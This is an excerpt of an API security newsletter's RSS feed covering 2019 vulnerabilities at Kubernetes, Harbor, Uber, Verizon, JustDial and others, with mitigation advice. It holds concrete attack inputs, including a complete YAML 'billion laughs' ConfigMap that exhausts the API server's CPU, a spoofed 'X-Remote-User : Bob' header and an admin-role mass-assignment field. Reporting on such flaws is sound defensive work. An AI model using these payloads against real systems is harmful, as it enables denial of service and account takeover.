<h2>Vulnerability: Kubernetes</h2>
<p>We talked about the &#8220;billion laughs&#8221; attack against Kubermetes API Server <a href="https://apisecurity.io/issue-52-nist-zero-trust-architecture-guidelines/">just a couple weeks ago</a>. The latest patch releases for Kubernetes include a fix for <a href="https://blog.paloaltonetworks.com/2019/10/cloud-kubernetes-vulnerabilities/" target="_blank" rel="noopener noreferrer">another API vulnerability</a>.</p>
<p>This time, the vulnerability affects configurations where Kubernetes API Server is behind an authentication proxy. If the proxy and Kubernetes had different ways of treating HTTP headers, attackers could authenticate as any user using an invalid header.</p>
<p>According to the <a href="https://tools.ietf.org/html/rfc7230" target="_blank" rel="noopener noreferrer">RFC</a>, HTTP headers should not have a space between the header name and the colon after it. However, the Go library that Kubernetes API Server used did not follow the RFC and accepted such headers.</p>
<p>Attackers could exploit this vulnerabilities with the following scenario:</p>
<ol>
<li>An attacker wants to get authenticated as Bob but does not have Bob&#8217;s credentials.</li>
<li>The attacker sends a request with the HTTP header <code>X-Remote-User : Bob</code> (this field is used to identify the user). Note the space in front of the colon.</li>
<li>Some authentication proxies only enforce blacklist rules for specific headers. For them, <code>X-Remote-User :</code> (with space) is not the same as <code>X-Remote-User:</code> (without space). Thus, instead of stripping the header out, they let it through to Kubernetes.</li>
<li>Kubernetes accepts the call and interprets it as an authenticated request from Bob.</li>
</ol>
<p><img loading="lazy" decoding="async" class="aligncenter size-medium" src="https://blog.paloaltonetworks.com/wp-content/uploads/2019/10/image1-1.png" width="1734" height="694" /></p>
<h2>Vulnerability: Harbor</h2>
<p>A critical API vulnerability was found in the popular container registry software, Harbor. Their internal team has flagged <a href="https://github.com/goharbor/harbor/security/advisories/GHSA-x2r2-w9c7-h624" target="_blank" rel="noopener noreferrer">an issue with broken access control</a>.</p>
<p>Details are a little scarce, but from what we know, it looks like an authorization issue. Project administrators of one project could use the Harbor API  and create a robot account with unauthorized push and pull access permissions to another project for which they had no access to or control over.</p>
<p>This is a second API vulnerability at Harbor in the last few weeks. Back in September we covered a <a href="https://apisecurity.io/issue-50-harbor-api-vulnerability-dangers-crud-apis/">Mass Assignment flaw in Harbor self-registration API</a>.</p>
<h2>Opinion: API Security &amp; Airport Security</h2>
<p><a href="https://gcn.com/articles/2019/10/14/airports-metaphor-api-security.aspx" target="_blank" rel="noopener noreferrer">Nial Darbey has posted an article</a> in which he explores the analogy of API security and airport security. He covers the following API security best practices:</p>
<ul>
<li>Distributed authentication</li>
<li>Authorization</li>
<li>Minimal scope</li>
<li>API decomposition</li>
<li>Behavior monitoring and anomaly detection</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-54-api-vulnerabilities-in-erosary-kubernetes-harbor/">Issue 54: API vulnerabilities in eRosary, Kubernetes, Harbor</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 53: Vulnerabilities in TwitterKit, JustDial, Voi e-scooters</title>
		<link>https://apisecurity.io/issue-53-vulnerabilities-in-twitterkit-justdial-voi-e-scooters/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 16 Oct 2019 22:00:27 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6357</guid>

					<description><![CDATA[<p>This week, we take a look at how out-of-date library compromises login to Twitter, how simple parameter switch gave access to over 150 million JustDial user accounts, and how holes in API security can lead a business to give out uncontrolled freebies. In addition, there is an update on Google&#8217;s decision to change the access [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-53-vulnerabilities-in-twitterkit-justdial-voi-e-scooters/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-53-vulnerabilities-in-twitterkit-justdial-voi-e-scooters/">Issue 53: Vulnerabilities in TwitterKit, JustDial, Voi e-scooters</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at how out-of-date library compromises login to Twitter, how simple parameter switch gave access to over 150 million JustDial user accounts, and how holes in API security can lead a business to give out uncontrolled freebies. In addition, there is an update on Google&#8217;s decision to change the access to their Nest smarthome platform and why this has happened.</p>
<h2>Vulnerability: TwitterKit for iOS API SDK</h2>
<p><a href="https://blog.appicaptor.com/2019/10/04/vulnerable-library-warning-twitterkit-for-ios/" target="_blank" rel="noopener noreferrer">Appicaptor has revealed</a> that applications using the TwitterKit for iOS library to access Twitter API are vulnerable to man-in-the-middle attacks. Both Twitter access and Login with Twitter scenarios are vulnerable because the API does not properly validate the TLS certificate for <code>api.twitter.com</code>.</p>
<p>The issue stems from good intentions colliding with imperfect implementation. For added security, TwitterKit for iOS implemented public key pinning of trusted root certificate authorities. However, because of their implementation of the public key pinning method, a leaf certificate is not properly verified in certificate pinning. The SDK checks for signatures but not domain names.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-medium" src="https://blog.appicaptor.com/wp-content/uploads/2019/10/mitm_EN-2.png" width="636" height="239" /></p>
<blockquote><p><em>Because of the missing domain name verification, any valid certificate chain containing a certificate with a public key hash of that list is accepted by the app. An attacker with a valid certificate for his own domain, issued by one of these CAs, can use this certificate for man-in-the-middle-attacks against apps communicating via the Twitter Kit for iOS with <code>api.twitter.com</code>. As the implementation does not check the position inside the chain, the matching public key could also be in the middle of the chain, such as in case of an intermediate certificate.</em></p></blockquote>
<p>TwitterKit for iOS is no longer supported and thus will not be fixed, so developers should immediately switch using <a href="https://blog.twitter.com/developer/en_us/topics/tools/2018/discontinuing-support-for-twitter-kit-sdk.html" target="_blank" rel="noopener noreferrer">alternative APIs</a> in their apps.</p>
<p>Certificate pinning is a great way to improve mobile application API security. However, it needs to be carefully designed. Ensure that you use standard SDKs and mobile OS libraries for certificate verification and do not re-invent the wheel.</p>
<h2>Vulnerability: JustDial</h2>
<p>Almost 156 million accounts were exposed because of a flawed API at JustDial, a local search service in India, <a href="https://www.moneycontrol.com/news/trends/exclusive-just-dial-security-flaw-may-allow-hackers-to-breach-pay-accounts-of-156-million-users-4514931.html" target="_blank" rel="noopener noreferrer">a security researcher has found</a>.</p>
<p>Attackers could enter the victim&#8217;s phone number in the <code>username</code> parameter in a call to the JustDial Register API to gain access to the user account.</p>
<blockquote><p><em>The system would then return an access token, system ID (SID) and user ID (UID). Using the SID, the hacker can access the victim’s Jd pay account and other accounts, whereas the UID would allow posting on the victim’s social profile.</em></p></blockquote>
<p>This seems to be an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm">API1: Broken Object-Level Authorization in OWASP API Top 10</a>.</p>
<p>This is <a href="https://apisecurity.io/issue-28-breaches-tchap-shopify-justdial/">the second large-scale JustDial vulnerability this year</a>.</p>
<h2>Vulnerability: Voi E-Scooter</h2>
<p>A security researcher has found an API vulnerability that allowed <a href="https://www.bleepingcomputer.com/news/security/researcher-adds-100-000-worth-of-credit-to-voi-e-scooter-app/" target="_blank" rel="noopener noreferrer">adding $100K of free credit to a Voi e-scooter account</a>.</p>
<p>Voi has several partner companies that can offer promo codes for free rides. While the Voi app UI properly verifies the information to create accounts and to add coupons, the API behind it doesn&#8217;t. By bypassing the UI and invoking the API directly, the researcher was able to create an account without having to verify email address and add payment methods, and then to add unlimited amount of promo codes to his account.</p>
<p>Lessons learned: do not implement security only on the UI, extend it to your APIs as well.</p>
<h2>Governance: Google redoing Nest API access</h2>
<p>An interesting<a href="https://staceyoniot.com/why-google-risked-customer-goodwill-to-kill-works-with-nest/" target="_blank" rel="noopener noreferrer"> case study of API security governance by Stacey Higginbotham</a>.</p>
<p>Google had to kill their &#8220;Works with Nest&#8221; program and redefine API access to Nest devices to save themselves and users from smarthome security breaches, and to maintain control of their platform.</p>
<p>Initial Nest APIs allowed direct communications with any other smart devices and services. This not only kept Google from controlling the ecosystem. It also allowed rogue devices and services to gain more access than the end-user expected to grant.</p>
<p>Google now killed the old &#8220;Works with Nest&#8221; API access program. Instead of it, this week, they announced the more controlled way that Nest API access will be provided via &#8220;Works with Google Assistant&#8221; program for the broad consumer audience. There is also going to be Direct Access for Individuals program for enthusiasts.</p>
<p>The post <a href="https://apisecurity.io/issue-53-vulnerabilities-in-twitterkit-justdial-voi-e-scooters/">Issue 53: Vulnerabilities in TwitterKit, JustDial, Voi e-scooters</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 52: NIST Zero Trust Architecture Guidelines</title>
		<link>https://apisecurity.io/issue-52-nist-zero-trust-architecture-guidelines/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 09 Oct 2019 22:00:14 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6346</guid>

					<description><![CDATA[<p>This week, Kubernetes API server was found vulnerable to the Billion laughs attack, NIST has opened their Zero Trust Architecture guidelines for commenting, and VS Code OpenAPI extension got an update with API Contract Security Audit built-in. Vulnerabilities: Kubernetes The Kubernetes API server is currently vulnerable to the so-called Billion laughs attack. This is the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-52-nist-zero-trust-architecture-guidelines/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-52-nist-zero-trust-architecture-guidelines/">Issue 52: NIST Zero Trust Architecture Guidelines</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, Kubernetes API server was found vulnerable to the Billion laughs attack, NIST has opened their Zero Trust Architecture guidelines for commenting, and VS Code OpenAPI extension got an update with API Contract Security Audit built-in.</p>
<h2>Vulnerabilities: Kubernetes</h2>
<p>The Kubernetes API server <a href="https://github.com/kubernetes/kubernetes/issues/83253">is currently vulnerable to the so-called Billion laughs attack</a>. This is the term typically used for XML expansion denial-of-service attacks. An XML sent through an API has a built-in recursion to overload XML parsers.</p>
<p>In case of Kubernetes, attackers can use an API to create a <code>ConfigMap</code> with the recursion in the YAML manifest like the one shown below:</p>
<pre><code>apiVersion: v1
data:
  a: &amp;a ["web","web","web","web","web","web","web","web","web"]
  b: &amp;b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &amp;c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &amp;d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &amp;e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &amp;f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &amp;g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &amp;h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &amp;i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default</code></pre>
<p>When the API server attempts to expand the structure, it overloads the CPU and becomes unresponsive.</p>
<p>The patches for this vulnerability are coming in the next updates for Kubernetes. For now, it is recommended that you limit the access to the vulnerable API:</p>
<ul>
<li>Limit access to trusted accounts only</li>
<li>Review user roles and their membership</li>
<li>Consider removing internet access</li>
</ul>
<h2>Standards: NIST Zero Trust Architecture</h2>
<p>US National Institute of Standards and Technology (NIST) has published their <a href="https://csrc.nist.gov/News/2019/zero-trust-architecture-draft-sp-800-207">Zero Trust Architecture: Draft NIST SP 800-207</a>.</p>
<p>Proliferation of microservices along with mobile, IoT, cloud, and hybrid applications has reduced the effectiveness of edge protection. All these trends made Zero Trust approach to API security extremely relevant.</p>
<p>Quoting from the document:</p>
<blockquote><p>A Zero Trust Architecture (ZTA) strategy is one where there is no implicit trust granted to systems based on their physical or network location (i.e., local area networks vs. the Internet). Access to data resources is granted when the resource is required, and authentication (both user and device) is performed before the connection is established. ZTA is a response to enterprise network trends that include remote users and cloud-based assets that are not located within an enterprise-owned network boundary. ZTA focuses on protecting resources, not network segments, as the network location is no longer seen as the prime component to the security posture of the resource. This document contains an abstract definition of ZTA and gives general deployment models and use cases where ZTA could improve an enterprise’s overall IT security posture.</p></blockquote>
<p>The document is open for public commenting until November 22, 2019.</p>
<h2>Tools: API Contract Security Audit in VS Code</h2>
<p><a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.vscode-openapi">OpenAPI / Swagger Editor is a popular extension for Visual Studio Code</a>. Thousands of developers use it when developing REST APIs. It provides API navigation, code-snippets, and linting. In this week&#8217;s update, it can now also provide static analysis of the API definition through API Contract Security Audit.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6347" src="https://apisecurity.io/wp-content/uploads/2019/10/Perform-REST-API-Security-Audit.gif" alt="" width="600" height="338" /></p>
<p>The functionality uses a remote API security verification service from 42Crunch. When you open an API contract in VS Code and click the Security Audit button, the extension runs over 200 various checks on the API and its security. These includes checks for best practices in authentication, authorization, transport, and data inputs and outputs.</p>
<p>The analysis is static, so it does not make any calls to the actual API endpoint.</p>
<p>The reports also provide information on the possible exploit scenarios of the security risks and recommended ways to mitigate them.</p>
<p>The post <a href="https://apisecurity.io/issue-52-nist-zero-trust-architecture-guidelines/">Issue 52: NIST Zero Trust Architecture Guidelines</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 51: Gartner releases full report on API security</title>
		<link>https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 02 Oct 2019 22:12:48 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6335</guid>

					<description><![CDATA[<p>This week, we ponder when is an API vulnerability a vulnerability, and check out Gartner&#8217;s new report and OWASP&#8217;s new API security project. Vulnerability: Cisco Webex and Zoom Definitions of API vulnerabilities can vary: what someone considers a vulnerability may be design to someone else. This is exactly the case with this week&#8217;s vulnerability. Cequence [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/">Issue 51: Gartner releases full report on API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div>
<p>This week, we ponder when is an API vulnerability a vulnerability, and check out Gartner&#8217;s new report and OWASP&#8217;s new API security project.</p>
<h2>Vulnerability: Cisco Webex and Zoom</h2>
<p>Definitions of API vulnerabilities can vary: what someone considers a vulnerability may be design to someone else. This is exactly the case with this week&#8217;s vulnerability.</p>
<p>Cequence researchers think that <a href="https://www.securityweek.com/webex-zoom-meetings-exposed-snooping-enumeration-attacks" target="_blank" rel="noopener noreferrer">the APIs of Cisco Webex and Zoom are vulnerable</a>. Attackers can enumerate the alphanumeric meeting IDs through API calls. If the host has not set a password, the attackers can access the meeting simply with a valid ID and snoop on the meetings.</p>
<p>The vendors claim this is by design to improve the user experience and optional, and thus not a real vulnerability. However, the meeting passwords are now on by default with both vendors, so at least users have to opt in on this one.</p>
<p>It is not clear from the article whether the vendors are using other techniques to prevent the attack. Obvious low hanging fruits would be:</p>
<ul>
<li>Low rate limits on the API calls to join meetings. There is no reason why someone would need to try more than one meeting ID in a second and more than a few per minute / hour / day.</li>
<li>Automated client lockouts when enumeration is detected.</li>
<li>Hard to guess and enumerate meeting IDs: longer and randomly generated.</li>
</ul>
<h2>Analysts: Gartner</h2>
</div>
<div>
<p>Gartner has released their latest report on API security: <a href="https://www.gartner.com/en/documents/3956746/api-security-what-you-need-to-do-to-protect-your-apis" target="_blank" rel="noopener noreferrer">&#8220;API Security: What You Need to Do to Protect Your APIs&#8221;</a> by Dionisio Zumerle, Jeremy D&#8217;Hoinne, and Mark O&#8217;Neill.</p>
<p>API breaches are continuing to occur frequently. With API proliferation and each API being an additional and potentially unique attack vector, traditional application security solutions alone are not sufficient to offer effective protection.</p>
<p>Microservices, mobile clients, and hybrid deployments also make single-point &#8220;gateway&#8221;-style protection rarely effective.</p>
<p>The report talks about:</p>
<ul>
<li>Approaches and technology to discover APIs and the vulnerabilities in them before attackers do</li>
<li>DevSecOps approach to API security</li>
<li>Distributed enforcement model.</li>
</ul>
<p>A must read for anyone in API security.</p>
</div>
<div>
<h2>Why OWASP API Security Top 10</h2>
</div>
<div>
<p>OWASP Top 10 was first published in 2003 and has become a popular resource for web application security.</p>
<p>Later this year, OWASP is releasing its first ever <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm">OWASP Top 10 list for API Security</a>.</p>
<p>In his article <a href="https://www.darkreading.com/application-security/why-you-need-to-think-about-api-security/a/d-id/1335861" target="_blank" rel="noopener noreferrer">&#8220;Why You Need to Think About API Security&#8221;</a>, one of the project leaders, Erez Yalon:</p>
<ul>
<li>Explains why API-based apps today are fundamentally different than the traditional apps</li>
<li>Lists some API-specific security risks</li>
<li>Introduces the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10 Project</a>.</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6341" src="https://apisecurity.io/wp-content/uploads/2019/10/TraditionalVModern.jpg" alt="" width="916" height="565" /></p>
</div>
<p>The post <a href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/">Issue 51: Gartner releases full report on API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 50: Harbor API vulnerability, and the dangers of CRUD APIs</title>
		<link>https://apisecurity.io/issue-50-harbor-api-vulnerability-dangers-crud-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 25 Sep 2019 22:00:24 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6320</guid>

					<description><![CDATA[<p>This week, we take a look at Harbor&#8217;s API vulnerability, the flawed architecture of CRUD-based apps, PSD2 effect on API security, and API security tooling. Vulnerability: Harbor Harbor is a popular open source container registry. This week, researchers have found about 1,300 Harbor endpoints affected by an API vulnerability. The vulnerability is a classical case [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-50-harbor-api-vulnerability-dangers-crud-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-50-harbor-api-vulnerability-dangers-crud-apis/">Issue 50: Harbor API vulnerability, and the dangers of CRUD APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at Harbor&#8217;s API vulnerability, the flawed architecture of CRUD-based apps, PSD2 effect on API security, and API security tooling.</p>
<h2>Vulnerability: Harbor</h2>
<p>Harbor is a popular open source container registry. This week, <a href="https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/" target="_blank" rel="noopener noreferrer">researchers have found about 1,300 Harbor endpoints affected by an API vulnerability</a>.</p>
<p>The vulnerability is a classical case of mass assignment API flaws. An API represents a data structure in internal database. It takes a set of submitted properties and applies them to an object in the database as is. As a result, if attackers are able to guess an internal property and include it in their request, they can overwrite the data in the database.</p>
<p>In this particular case, this was a <code>POST</code> request to the API to self-register a new user. It turned out that including <code>"has_admin_role"=True</code> in the API call set that property on the new user object. This made the new users administrators of the registry, allowing them to modify the registry as well as all the containers in the system.</p>
<h2>Design flaws: CRUD APIs</h2>
<p>One of the popular ways to design a modern application is:</p>
<ol>
<li>Take a database, such as MongoDB.</li>
<li>Wrap the database into a simple CRUD REST API, meaning that the API that has Create, Read, Update, and Delete methods for all data in the database.</li>
<li>Create web and mobile clients around the data.</li>
</ol>
<p>In her piece, <a href="https://42crunch.com/we-need-the-controller-layer-back/" target="_blank" rel="noopener noreferrer">Isabelle Mauny explains why this approach is flawed</a> and leads to highly vulnerable systems. In fact, it <em>directly</em> leads to the <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm">A1</a>, <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">A3</a>, <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm">A5</a>, and <a href="https://apisecurity.io/encyclopedia/content/owasp/api6-mass-assignment.htm">A6</a> flaws from the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm">OWASP API Security Top 10 list</a>.</p>
<p>She also explains how to mitigate the vulnerabilities by adding a controller layer that isolates, formats, and filters data, and enforces authentication and authorization.</p>
<h2>Industry trends: PSD2, Open Banking, FAPI</h2>
<p>PSD2 and Open Banking are forcing banks to open up APIs to their highly sensitive data. <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/when-psd2-opens-more-doors-the-risks-of-open-banking/" target="_blank" rel="noopener noreferrer">A new research by Trend Micro</a> looks into API security risks that emerge as a result of this regulation.</p>
<p>On the one hand, regulation replaces the dangerous scraping approach and promotes secure authentication. This standardization helps reduce the issues that stem from ad hoc flawed API designs.</p>
<p>On the other hand, it also significantly expands the attack surface:</p>
<ul>
<li>Proliferation of APIs that can be attacked</li>
<li>FinTech companies with potentially low cybersecurity expertise and resources</li>
<li>User attacks</li>
</ul>
<h2>Tools</h2>
<p>API security tooling keeps on growing. Kristopher Sandoval from NordicAPIs has compiled a list of his favorite <a href="https://nordicapis.com/20-resources-to-nail-down-tough-api-security-concepts/" target="_blank" rel="noopener noreferrer">20+ tools and resources for API security</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-50-harbor-api-vulnerability-dangers-crud-apis/">Issue 50: Harbor API vulnerability, and the dangers of CRUD APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 49: Uber account takeover and the leaky Get API</title>
		<link>https://apisecurity.io/issue-49-uber-account-takeover-leaky-get-api/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 18 Sep 2019 22:00:25 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6307</guid>

					<description><![CDATA[<p>This week, we check out the details of two API vulnerabilities at Uber and Get, the updated 42Crunch API security platform, and Red Hat&#8217;s vision of the future of API management. Vulnerability: Uber Anand Prakash found a way to do full account takeover on Uber through a vulnerability in their APIs. The same approach worked [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-49-uber-account-takeover-leaky-get-api/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-49-uber-account-takeover-leaky-get-api/">Issue 49: Uber account takeover and the leaky Get API</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the details of two API vulnerabilities at Uber and Get, the updated 42Crunch API security platform, and Red Hat&#8217;s vision of the future of API management.</p>
<h2>Vulnerability: Uber</h2>
<p>Anand Prakash <a href="https://appsecure.security/blog/how-i-could-have-hacked-your-uber-account" target="_blank" rel="noopener noreferrer">found a way to do full account takeover on Uber</a> through a vulnerability in their APIs. The same approach worked with accounts for <em>any</em> Uber services, including drivers and Uber Eats:</p>
<ol>
<li>Make an invalid <code>addDriver</code> call  (that includes the phone number or email address of a user.) This makes the API leak the UUID of the user in question in the returned error message. You could even create a script to iterate the calls to get the UUIDs for many Uber users.</li>
<li>Make a <code>getConsentScreenDetails</code> call with the  UUID you got. This call leaks all user info for the given UUID, including the mobile app auth token. You now have what it takes to fully take over the account.</li>
</ol>
<p>Thankfully, Uber fixed this one quickly after it was brought to their attention.</p>
<p>Lessons learnt with this one:</p>
<ul>
<li>Make sure that errors never leak any sensitive information, and define your API outputs including errors carefully.</li>
<li>No unauthenticated API calls should ever provide <em>any</em> sensitive information.</li>
<li>No unauthenticated calls should <em>ever</em> provide an authentication token!</li>
</ul>
<h2>Vulnerability: Get</h2>
<p>Get (formerly Qnect) is a popular app for university societies and clubs. It operates in four countries, has 159K active users, and 453 clubs.</p>
<p>An Australian student found out that<a href="https://www.reddit.com/r/unsw/comments/d0qzro/massive_50k_australian_student_data_breach" target="_blank" rel="noopener noreferrer"> the API behind the Get app was not protected</a>. Even worse, the API gave unlimited access to all users and their personal information, such as  names, emails, phone numbers, dates of birth, and Facebook ID’s.</p>
<p>If you are an application developer, please remember that your APIs are not just an implementation detail! People will try to figure out how to invoke them directly:</p>
<ul>
<li>All APIs <em>must</em> be protected.</li>
<li>APIs should not be giving the client more data than what the client needs.</li>
</ul>
<h2>Tools: 42Crunch Platform</h2>
<p>42Crunch <a href="https://42crunch.com/api-firewall-nonblocking-mode-latest-release/" target="_blank" rel="noopener noreferrer">has rolled out an update to their API security platform</a>.</p>
<p>The biggest new feature is that API Firewall now offers also non-blocking mode. This mode lets you run the protection configuration for your API as read-only. API Firewall still detects and logs all calls to the API that breach the API contract but does not block the calls. This helps you to assess the impact to your existing API traffic without impacting your API consumers.</p>
<p>In addition, the developer tooling in the platform also got enhancements, such as the improved integration between the API Contract Security Audit and Security Editor, and UX improvements to the audit report.</p>
<h2>Opinion: The future of API management</h2>
<p><a href="https://sdtimes.com/api/the-next-wave-of-api-management/" target="_blank" rel="noopener noreferrer">SD Times published an interview with David Codelli</a> (3Scale / Red Hat) about his views on the future of API management. Here&#8217;s a quick summary of the main points:</p>
<ol>
<li>Service meshes make API management vendors rethink what they want to secure and when.</li>
<li>API management needs to move to code (like infrastructure did with Kubernetes).</li>
<li>When designing API security, internal APIs need to get the same care and attention as the public ones.</li>
</ol>
<p>The post <a href="https://apisecurity.io/issue-49-uber-account-takeover-leaky-get-api/">Issue 49: Uber account takeover and the leaky Get API</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 48: Vulnerabilities at Verizon and GPS trackers, S3 bucket names leaking</title>
		<link>https://apisecurity.io/issue-48-vulnerabilities-verizon-gps-trackers-s3-bucket-names-leaking/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 11 Sep 2019 22:00:47 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6297</guid>

					<description><![CDATA[<p>This week, we look at the recent vulnerabilities at Verizon and Shenzhen i365-Tech GPS trackers, leaking S3 bucket names, and Facebook cutting API access for some of its partners. Vulnerability: Verizon 2 million Verizon Wireless Pay Monthly contracts were found open for anyone to access. The researcher managed to get a valid cookie while browsing [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-48-vulnerabilities-verizon-gps-trackers-s3-bucket-names-leaking/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-48-vulnerabilities-verizon-gps-trackers-s3-bucket-names-leaking/">Issue 48: Vulnerabilities at Verizon and GPS trackers, S3 bucket names leaking</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look at the recent vulnerabilities at Verizon and Shenzhen i365-Tech GPS trackers, leaking S3 bucket names, and Facebook cutting API access for some of its partners.</p>
<h2>Vulnerability: Verizon</h2>
<p>2 million Verizon Wireless Pay Monthly contracts <a href="https://daleys.space/writeup/0day/2019/09/09/verizon-leak.html" target="_blank" rel="noopener noreferrer">were found open</a> for anyone to access.</p>
<p>The researcher managed to get a valid cookie while browsing the various paths he was able to locate with Google. It turned out that he could then use that cookie to authenticate his calls to the system and retrieve PDFs of customer contracts.</p>
<p>The contract IDs were just sequential numeric values and authorization was not enforced per contract. He could thus simply iterate on the contract ID parameter (<code>m</code>), and the phone number parameter (<code>a</code>) didn&#8217;t have to match the ID:</p>
<p><code>/example?m=12334567890&amp;a=1337</code></p>
<p>Another example on why you should never use sequential IDs, and why proper authentication and authorization are crucial. Rate limiting helps against brute force enumeration attacks too.</p>
<h2>Vulnerability: GPS trackers</h2>
<p>API vulnerabilities in cloud services remain the weakest link in consumer IoT.</p>
<p>At least 600K GPS trackers from Shenzhen i365-Tech <a href="https://zdnet.com/article/600000-gps-trackers-left-exposed-online-with-a-default-password-of-123456" target="_blank" rel="noopener noreferrer">were found to be vulnerable this week</a>. The cloud service behind the trackers uses sequential IDs that you can enumerate and a default password <code>123456</code>. Not too complex to breach, then.</p>
<p>This vulnerability poses even a physical security threat considering that GPS trackers are often used to track location of pets, kids, and the elderly.</p>
<p>In addition to sequential IDs, default passwords are also evil. Don&#8217;t do it.</p>
<h2>Vulnerability: Data leaking in errors</h2>
<p>Error messages are a frequent source of data leaks.</p>
<p>Neeraj Edwards <a href="https://twitter.com/neeraj_sonaniya/status/1166583456442331136" target="_blank" rel="noopener noreferrer">found a way to make error messages leak AWS S3 bucket names</a>.</p>
<p>His approach was quite simple:</p>
<ol>
<li>Find any CDN object URL</li>
<li>Append the following string after the URL:</li>
</ol>
<p><code>`?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&amp;Expires=1766972005&amp;Signature=ccc</code></p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6298" src="https://apisecurity.io/wp-content/uploads/2019/09/S3-Bucket-name-in-api-error.jpg" alt="" width="1366" height="768" /></p>
<p>The approach did not work on CloudFront URL&#8217;s, but it did work on other domains set through AWS S3 CNAME.</p>
<p>If you are an API provider, make sure you document and enforce not just API inputs but also outputs, including error responses.</p>
<h2>API economy: API Governance</h2>
<p>API governance can become a trouble for both parties.</p>
